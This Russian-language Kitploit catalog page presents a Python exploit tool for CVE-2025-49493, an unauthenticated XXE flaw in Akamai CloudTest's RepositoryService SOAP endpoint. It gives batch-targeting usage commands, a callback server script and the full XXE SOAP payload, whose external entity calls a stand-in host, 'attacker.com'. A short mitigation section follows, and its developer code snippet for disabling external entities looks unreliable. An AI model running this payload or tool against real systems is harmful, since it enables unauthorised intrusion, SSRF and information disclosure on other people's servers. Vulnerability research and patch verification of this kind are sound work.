Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-49493 — This is a Python-based exploit for CVE-2025-49493, which affects Akamai CloudTest versions before 60 2025.06.02 (12988). The vulnerability allows for XML External Entity (XXE) injection through the SOAP service endpoint. | Kitploit
Инструменты/GitHubGitHub/sh4den/cve-2025-49493
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubsh4den/cve-2025-49493

CVE-2025-49493

This is a Python-based exploit for CVE-2025-49493, which affects Akamai CloudTest versions before 60 2025.06.02 (12988). The vulnerability allows for XML External Entity (XXE) injection through the SOAP service endpoint.

Репозиторий
11 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт XXE для Akamai CloudTest (CVE-2025-49493)

Обзор

Это эксплойт на Python для CVE-2025-49493, который затрагивает Akamai CloudTest версий до 60 2025.06.02 (12988). Уязвимость позволяет внедрение XML-внешних сущностей (XXE) через конечную точку SOAP-сервиса.

Детали уязвимости

  • CVE ID: CVE-2025-49493
  • Тип уязвимости: Внедрение XML-внешних сущностей (XXE)
  • Серьёзность: Критическая (CVSS 9.1)
  • Затронутое ПО: Akamai CloudTest
  • Затронутые версии: до 60 2025.06.02 (12988)
  • Вектор атаки: Сеть
  • Требуется аутентификация: Нет

Технические детали

Уязвимость существует в конечной точке SOAP /concerto/services/RepositoryService, где XML-вход обрабатывается без надлежащей санитизации внешних сущностей. Злоумышленник может создать вредоносные XML-нагрузки для запуска XXE-атак, что может привести к:

  • Раскрытию информации
  • SSRF (Подделка серверных запросов)
  • Отказу в обслуживании
  • Потенциальному удаленному выполнению кода в определенных конфигурациях

Возможности

  • Обнаружение целей: Автоматически определяет экземпляры Akamai CloudTest
  • Обнаружение уязвимости: Проверяет уязвимые конечные точки и индикаторы
  • Эксплуатация XXE: Отправляет сформированные SOAP-запросы с полезными нагрузками XXE
  • Несколько целей: Поддерживает пакетную обработку из файлов целей
  • Детальное логирование: Комплексное цветное логирование с временными метками
  • Обработка ошибок: Надёжная обработка ошибок для сетевых проблем

Установка

Предварительные требования

  • Python 3.6 или выше
  • менеджер пакетов pip

Зависимости

Установите необходимые пакеты:

root@kitploit:~
pip install -r requirements.txt

Или установите вручную:

root@kitploit:~
pip install requests urllib3 colored pyfiglet

Использование

Базовое использование

root@kitploit:~
python main.py targets.txt xxe.attacker.com

Расширенное использование

root@kitploit:~
# With custom timeout
python main.py targets.txt collaborator.burp.com --timeout 20

# Using interactsh for OOB detection
python main.py targets.txt attacker.interactsh.com

Параметры командной строки

root@kitploit:~
positional arguments:
  targets              Файл целей, содержащий список хостов Akamai CloudTest
  xxe_server          XXE-сервер для захвата запросов (например, attacker.com или IP)

optional arguments:
  -h, --help          показать это справочное сообщение и выйти
  --timeout TIMEOUT   Тайм-аут запроса в секундах (по умолчанию: 10)

Формат файла целей

Создайте файл targets.txt с одной целью на строку:

root@kitploit:~
https://example-cloudtest.akamai.com
https://demo-cloudtest.example.com
https://test-cloudtest.internal.company.com
https://cloudtest.example.org

Настройка XXE-сервера

Вариант 1: Использование Burp Collaborator

  1. Откройте Burp Suite Professional
  2. Перейдите в Burp > Burp Collaborator client
  3. Нажмите "Copy to clipboard", чтобы получить URL collaborator
  4. Используйте этот URL как параметр xxe_server

Вариант 2: Использование Interactsh

  1. Установите interactsh: go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
  2. Запустите: interactsh-client
  3. Используйте предоставленный URL как параметр xxe_server

Вариант 3: Пользовательский HTTP-сервер

Настройте простой HTTP-сервер для захвата запросов:

root@kitploit:~
# simple_server.py
import http.server
import socketserver

class RequestHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        print(f"XXE Request received: {self.path}")
        print(f"Headers: {self.headers}")
        super().do_GET()

with socketserver.TCPServer(("", 8000), RequestHandler) as httpd:
    print("Server running on port 8000")
    httpd.serve_forever()

Процесс эксплуатации

  1. Проверка цели: Проверяет формат URL и доступность
  2. Обнаружение уязвимости:
    • Проверяет наличие индикаторов CloudTest в ответе
    • Проверяет существование конечной точки SOAP-сервиса
  3. Генерация полезной нагрузки XXE: Создает вредоносный SOAP-конверт с XXE
  4. Эксплуатация: Отправляет сформированный запрос на уязвимую конечную точку
  5. Анализ результата: Анализирует ответ на наличие индикаторов успеха

Структура полезной нагрузки XXE

Эксплойт использует следующую структуру полезной нагрузки XXE:

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
  <!ENTITY xxe SYSTEM "http://attacker.com">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:rep="http://example.com/services/repository">
   <soapenv:Header/>
   <soapenv:Body>
      <rep:getUIBundleObjectXml>
         <rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
      </rep:getUIBundleObjectXml>
   </soapenv:Body>
</soapenv:Envelope>

Смягчение

Для администраторов

  1. Немедленные действия:

    • Обновите Akamai CloudTest до версии 60 2025.06.02 или новее
    • Отслеживайте логи на предмет подозрительной обработки XML
    • Внедрите сегментацию сети для ограничения воздействия
  2. Долгосрочные решения:

    • Отключите обработку внешних сущностей XML в парсерах XML
    • Внедрите проверку ввода и очистку
    • Используйте белые списки для обработки XML
    • Регулярные оценки безопасности

Для разработчиков

  1. Безопасная обработка XML:

    root@kitploit:~
    # Disable external entities in XML parsers
    import xml.etree.ElementTree as ET
    parser = ET.XMLParser()
    parser.parser.DefaultHandler = lambda data: None
    parser.parser.ExternalEntityRefHandler = lambda *args: False
    
  2. Проверка ввода:

    • Проверяйте весь XML-ввод на соответствие строгим схемам
    • Очищайте данные, контролируемые пользователем, перед обработкой XML
    • Внедрите правильную обработку ошибок

Ссылки

  • Оригинальное исследование xbow
  • Журнал изменений Akamai CloudTest
  • Детали CVE-2025-49493
  • Предотвращение XXE от OWASP

Правовое уведомление

Этот инструмент предоставляется только для образовательных и авторизованных целей тестирования. Пользователи несут ответственность за получение надлежащего разрешения перед тестированием любых систем. Авторы не несут ответственности за неправомерное использование или ущерб, причиненный этим инструментом.

Участие в разработке

  1. Сделайте форк репозитория
  2. Создайте ветку функции
  3. Внесите свои изменения
  4. Добавьте тесты, если применимо
  5. Отправьте pull request

Лицензия

Этот проект лицензирован под лицензией MIT — подробности см. в файле LICENSE.

Авторы

  • Оригинальное исследование: xbow, 3th1c_yuk1
  • Разработка эксплойта: Security Research Team
  • Назначение CVE: CVE-2025-49493

Журнал изменений

v1.0.0

  • Первоначальный релиз
  • Базовая функциональность эксплуатации XXE
  • Поддержка файла целей
  • Комплексное логирование
  • Улучшения обработки ошибок
Скачать инструмент